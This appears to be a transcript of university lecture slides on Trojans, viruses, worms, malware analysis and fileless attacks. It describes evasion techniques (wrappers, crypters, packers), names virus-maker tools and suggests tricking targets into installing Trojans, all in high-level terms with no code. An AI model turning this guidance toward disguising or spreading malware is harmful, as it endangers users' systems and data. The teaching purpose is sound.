Trojans and Other Attacksrowdysites.msudenver.edu/~fustos/cis4500/pdf/chapter09.pdf1 Trojans and...
Transcript of Trojans and Other Attacksrowdysites.msudenver.edu/~fustos/cis4500/pdf/chapter09.pdf1 Trojans and...
.
1
Trojans and Other Attacks
Chapter #9:
CIS 4500
Outline
n Describe malware types and their purpose
n Identify malware deployment methods
n Describe the malware analysis process
n Identify malware countermeasures
n Describe DoS attacks and techniques
n Identify DoS detection and countermeasure action
n Describe session hijacking and sequence prediction
CIS 4500
The “Malware” Attacks
n Malware is generally defined as software designed to harm
or secretly access a computer system without the owner’s
informed consent
n CIS profession thinks of it as hostile, intrusive, annoying,
and definitely something to be avoided
n Most malware is simply downloaded from the Internet with
or without the user’s knowledge
CIS 4500
The “Malware” Attacks
n Software is considered to be malware based on the
perceived intent of the creator rather than any particular
features
n Most people think of viruses, worms, and Trojans as a
means to spread destruction and as a huge inconvenience
to computing life – to an ethical hacker the Trojan might
actually look like a good means to pull off a successful
exploit or to retain access to a machine—it’s simply one of
many tools in the arsenal.
.
2
CIS 4500
Malware
n There are a ton of “legitimate” applications, add-ons,
toolbars, and the like that aren’t intended to be malware,
but they may as well be
n Is “stealing” data for advertising purposes malware in
nature
n Or how about AV programs flagging applications as virus
and/or malware
CIS 4500
How to Get Malware
n Legitimate sites get compromised, leading to infections on
visiting systems
n Drive-by downloading infects the system, usually via some
weird Java vulnerability delivered through an ad stream
n Peer-to-peer applications or web application “features” are
often hijacked to distribute malware
n An IRC channel is always a great way to distribute malware
CIS 4500
How to Get Malware
n The absolute easiest way you can get a target to install
your malware is to just ask them to do it for you
n Send malware (usually a Trojan) via e-mail, file sharing, or a
browser and, more often than not, they’ll open it and happily
install whatever you want
CIS 4500
How to Pretend to Be Legitimate
n Wrappers
n Crypters and packers
.
3
CIS 4500
Wrappers
n Wrappers are programs that allow you to bind an
executable of your choice (Trojan) to an innocent file your
target won’t mind opening
n Your target opens the application
n Meanwhile, your backdoor is installing and sits there
waiting for your use later
n They have their own signatures and can definitely show up
on AV scans
CIS 4500
Crypters
n Crypters are software tools that use a combination of
encryption and code manipulation to render malware
undetectable to AV and other security monitoring products
(in Internet lingo, it’s referred to as fud, for “fully
undetectable”).
CIS 4500
Packers
n Packers use compression to pack the malware executable
into a smaller size
n It reduces the file size, it also serves to make the malware
harder to detect for some antivirus engines
n Both crypters and packers work much like a ZIP file, except
that the extraction occurs in memory and not on the disk
CIS 4500
Trojans
n Trojan is software that appears to perform a desirable
function for the user prior to running or installing it but
instead performs a function, usually without the user’s
knowledge, that steals information or otherwise harms the
system (or data)
n The word Trojan really means a method to gain, and
maintain, access on a target machine
.
4
CIS 4500
Trojan Ports
CIS 4500
Viruses
n A virus is a self-replicating program that reproduces its
code by attaching copies into other executable codes
n viruses create copies of themselves in other programs
n activate on some sort of trigger event (such as a specific user
task, a particular time, or an event of some sort)
n They usually get installed on a system via file attachments,
user clicks on embedded e-mails, or the installation of
pirated software
CIS 4500
Viruses
n Ransomeware
n this malware locks you out of your own system resources and
demands an online payment of some sort in order to release
them back to you
n usually the payment is smaller than the cost it would take to
remove the malware and recover anything lost. Ransomeware
is ubiquitous and unfortunately you’ll probably see it
somewhere, sometime in your travels
n Cryptorbit, CryptoLocker, CryptoDefense, and police-themed
CIS 4500
Viruses
n Boot sector virus
n also known as a system virus
n moves the boot sector to another location on the hard drive,
forcing the virus code to be executed first
n these viruses are almost impossible to get rid of once you get
infected
n you can re-create the boot record — but easy
.
5
CIS 4500
Viruses
n Shell virus
n working just like the boot sector virus, this virus type wraps
itself around an application’s code, inserting its own code
before the application’s
n every time the application is run, the virus code is run first
n Cluster virus
n this virus type modifies directory table entries so that user or
system processes are pointed to the virus code itself
n single copy of the virus “infects” everything
CIS 4500
Viruses
n Multipartite virus
n this generally refers to a virus with multiple infection vectors
n attempts to infect both files and the boot sector at the same
time
n multipartite can be combined with other attributes:
polymorphic, retroviral, boot sector, and generally a pretty
wild bit of code
CIS 4500
Viruses
n Macro virus
n probably one of the most common malware types you’ll see in
today’s world
n this is usually written with Visual Basic for Applications (VBA).
n this virus type infects template files created by Microsoft
Office, normally Word and Excel
CIS 4500
Viruses
n Polymorphic code virus
n this virus mutates its code using a built-in polymorphic engine
n this type of virus is difficult to find and remove because its
signature constantly changes
n no part of the virus stays the same from infection to infection
n Encryption virus
n this type of virus uses encryption to hide the code from
antivirus scanners
.
6
CIS 4500
Viruses
n Metamorphic virus
n rewrites itself every time it infects a new file
n Stealth virus
n also known as a “tunneling virus”
n attempts to evade antivirus (AV) applications by intercepting
the AV’s requests to the operating system (OS) and returning
them to itself instead of the OS
n the virus then alters the requests and sends them back to AV
as uninfected, making the virus now appear “clean”
CIS 4500
Viruses
n Cavity virus C
n cavity viruses overwrite portions of host files so as not to
increase the actual size of the file
n this is done using the null content sections of the file and
leaves the file’s actual functionality intact
n Sparse infector virus
n they only infect occasionally – e.g. maybe the virus only fires
every tenth time a specific application is run
CIS 4500
Viruses
n File extension virus
n they change the file extensions of files to take advantage of
most people having file extension view turned off
n e.g. readme.txt.vbs might appear as readme.txt with
extensions turned off
CIS 4500
Virus -Makers
n Sonic Bat
n PoisonVirus Maker
n Sam’s Virus Generator
n JPS Virus Maker
.
7
CIS 4500
Worms
n A worm is a self-replicating malware computer program
that uses a computer network to send copies of itself to
other systems without human intervention
n Usually it doesn’t alter files, but it resides in active memory
and duplicates itself, eating up resources and wreaking
havoc along the way
n The most common use for a worm in the hacking world is
the creation of botnets
CIS 4500
Worms
n Code Red
n named after the soft drink the eEye Digital guys were drinking
when they discovered it
n exploited indexing software on IIS servers in 2001
n used a buffer overflow and defaced servers
n Darlloz
n worm for “the Internet of Things,”; it is a Linux-based worm that
targets running ARM, MIPS, and PowerPC architectures— which
are usually routers, set-top boxes, and security cameras
CIS 4500
Worms
n Slammer
n also known as SQL Slammer
n a denial-of-service worm attacking buffer overflow weaknesses
in Microsoft SQL services. Also called Sapphire, SQL_HEL, and
n it spread quickly using UDP
n its small size (the entire worm could fit inside a single packet)
allowed it to bypass many sensors
CIS 4500
Worms
n Nimda
n worm’s name comes from the word admin spelled backward
n Nimda was a successful file infection virus that modified and
touched nearly all web content on a machine
n it spread so quickly it became the most widespread worm in
history within about 22 minutes of its first sighting
n Nimda spread through e-mail, open network shares, and
websites, and it also took advantage of backdoors left on
machines infected by the Code Red worm
.
8
CIS 4500
Worms
n Bug Bear
n propagating over open network shares and e-mail, Bug Bear
terminated AV applications and set up a backdoor for later use.
n it also contained keylogging capabilities
CIS 4500
Worms
n Pretty Park
n spread via e-mail (attempting a send every 30 minutes) and
took advantage of IRC to propagate stolen passwords and the
like
n running the worm executable often displayed the 3D Pipe
screensaver on Windows machines
CIS 4500
Malware Analysis
n The first step: have a good test bed
n using a virtual machine with the NIC in host-only mode and no
open shares is a good start
n Analyze the malware on that isolated VM while it’s in a
static state
n tools such as binText and UPX can help in examining the
binary itself as well as the compression and packaging
technique. Next, fire up the malware and check out the
processes in use (with Process Monitor and Process Explorer,
for example). Review network traffic using NetResident,
TCPview, or maybe even Wireshark. Lastly, check to see what
files are added, changed, or deleted, what processes continue
to spawn, and any changes to the registry. Tools that can help
you with malware analysis include, but are not limited to, IDA
Pro (www.hex-rays.com), VirusTotal (www.virustotal.com),
Anubis (Anubis .iseclab.org), and Threat Analyzer
(www.threattracksecurity.com).
CIS 4500
Non-Malware (or Fileless) Attack
n A user visits a website using a browser, perhaps driven there from a cleverly
disguised spam message
n On this page, Flash is loaded — Flash is a common attack vector due to its seemingly
never-ending set of vulnerabilities
n Flash invokes PowerShell, an OS tool that exists on every Windows machine, and
feeds it instructions through the command line — all operating in memory
n PowerShell connects to a stealth command and control server, where it downloads a
malicious PowerShell script that finds sensitive data and sends it to the attacker
n This attack never downloads any malware
.
9
CIS 4500
Tools for Your Lab
n VirtualBox (.org) – can also convert between formats
(.vmdk, .vdi .vhd)
n DOSBox (.com)
n VMWare player (VMWare.com)
n Free Windows VM (MS Developer)
n Metasploitable (Rapid7.com)
n Kali (.org)
Stay Alert!
There is no 100 percent secure system,
and there is nothing that is foolproof!